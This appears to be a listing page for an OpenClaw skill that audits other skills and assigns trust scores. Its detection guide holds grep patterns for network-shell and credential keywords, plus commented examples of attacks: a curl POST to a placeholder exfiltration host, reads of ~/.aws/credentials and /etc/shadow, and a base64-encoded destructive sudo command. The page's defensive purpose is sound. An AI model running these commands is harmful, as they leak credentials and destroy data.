Requirements
- Target platform
- OpenClaw
- Install method
- Manual import
- Extraction
- Extract archive
- Prerequisites
- OpenClaw
- Primary doc
- SKILL.md
Scan OpenClaw skills for security risks, suspicious permissions, and provide a trust score to help evaluate skill safety before use or installation.
Scan OpenClaw skills for security risks, suspicious permissions, and provide a trust score to help evaluate skill safety before use or installation.
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Then review README.md for any prerequisites, environment setup, or post-install checks. Tell me what you changed and call out any manual steps you could not complete.
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Then review README.md for any prerequisites, environment setup, or post-install checks. Summarize what changed and any follow-up checks I should run.
Scan OpenClaw skills for security issues, suspicious patterns, and give a trust score. Helps users make informed decisions about which skills to trust.
Before installing a new skill from ClawHub Auditing existing installed skills User asks "is this skill safe?" After ClawHavoc type incidents (malicious skills in ecosystem) Before running untrusted skills
CommandPurposescan-skill <path>Scan a single skillscan-allScan all skills in workspacetrust-score <path>Get quick trust score (0-100)list-permissions <path>List all requested permissions
Look for: bins - CLI tools skill needs env - Environment variables (API keys, tokens) requires.config - Required config settings requires.bins - Binary dependencies Red flags: Skills requesting many bins without clear purpose Env vars for sensitive services (AWS keys, database passwords) Config requiring admin/elevated permissions
Suspicious patterns to detect: # Network calls to unknown domains grep -E "(curl|wget|http|https).*\.com" SKILL.md grep -E "fetch\(|axios\(" SKILL.md # File system access beyond declared scope grep -E "rm -rf|dd |mkfs" SKILL.md # Credential access grep -E "password|secret|token|key" SKILL.md # Execution of downloaded code grep -E "eval\(|exec\(|system\(" SKILL.md # Base64 encoded commands grep -E "base64|-enc|-encode" SKILL.md
Score from 0-100 based on: FactorWeightCriteriaAuthor reputation20%Known author? Official OpenClaw skill?Permission scope30%Minimal bins/envs?Code patterns25%No suspicious commandsUpdate frequency15%Recently updated?Download count10%Popular = more scrutiny
ScoreRiskAction80-100๐ข LowSafe to use60-79๐ก MediumReview before use40-59๐ HighUse with caution0-39๐ด CriticalDon't use
๐ Skill: <skill-name> โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๐ Trust Score: <score>/100 (<risk-level>) ๐ Permissions Requested: โข bins: curl, jq โข env: OPENWEATHER_API_KEY โ ๏ธ Issues Found: 1. [MEDIUM] Requests network access but no clear purpose 2. [LOW] No recent updates (6+ months) โ Positive Signs: โข Official OpenClaw skill โข Clear documentation
Network exfiltration # Example: sending data to unknown servers # curl -X POST https://SUSPICIOUS-DOMAIN/exfil # fetch("https://data-collector.DOMAIN") Credential harvesting # Example: reading credentials # cat ~/.aws/credentials # grep "password" /etc/shadow Persistence mechanisms # Example: auto-start, cron, systemd # sudo crontab -l # systemctl enable Obfuscated code # Example: base64 encoded commands echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
Excessive permissions - More bins/envs than needed No documentation - Unclear what skill does Outdated - No updates in 6+ months Third-party dependencies - Unknown npm/go packages
โ Official OpenClaw skills (openclaw/skills) โ Clear, specific permissions โ Active maintenance (recent commits) โ Open source with clear code โ Known author with reputation
# 1. Get skill path (ClawHub or local) # 2. Run full scan scan-skill /path/to/skill # 3. Check trust score trust-score /path/to/skill # 4. Review issues # 5. Decide: install / skip / investigate more
# Weekly: scan all installed skills scan-all # Monthly: generate full report # Save to .learnings/ for documentation
# For quick decision trust-score <path> # If score < 60, do full scan # If score < 40, don't use
Works with self-improving-agent - Log security findings Use memory - Remember trust scores for known skills Report findings to user before risky operations
Always scan before installing untrusted skills Document scan results in .learnings/ Share findings with community (anonymized) Update trust scores when vulnerabilities found Trust but verify - Don't rely solely on automated scanning
User wants to install "cool-new-skill" from ClawHub: > scan-skill ./skills/cool-new-skill ๐ Scanning: cool-new-skill โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๐ Trust Score: 72/100 (๐ก Medium) ๐ Permissions: โข bins: none โข env: none โ ๏ธ Issues: โข No recent updates (8 months) โข Unknown author โ Positives: โข Clear documentation โข Minimal permissions ๐ก Recommendation: Safe to try, monitor usage
> scan-skill ./skills/suspicious-skill ๐ Scanning: suspicious-skill โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ ๐ Trust Score: 23/100 (๐ด CRITICAL) ๐ Permissions: โข bins: curl, base64 โข env: API_KEY, SECRET_TOKEN ๐จ CRITICAL ISSUES FOUND: 1. Network exfiltration pattern detected 2. Credential access attempt 3. Obfuscated commands (base64) ๐ Recommendation: DO NOT USE - Potential malware
> scan-all ๐ Scanning all skills in ~/.openclaw/workspace/skills/ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ github: 95/100 (safe) โ ๏ธ todoist: 68/100 (review needed) โ self-improving-agent: 92/100 (safe) ๐ด unknown-skill: 34/100 (remove recommended) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ Summary: 2 safe, 1 review, 1 remove
ClawHavoc incident (Feb 2026) - 341 malicious skills Agent Trust Hub - Third-party security tooling OpenClaw Security docs: docs.openclaw.ai/gateway/security
Identity, auth, scanning, governance, audit, and operational guardrails.
Largest current source with strong distribution and engagement signals.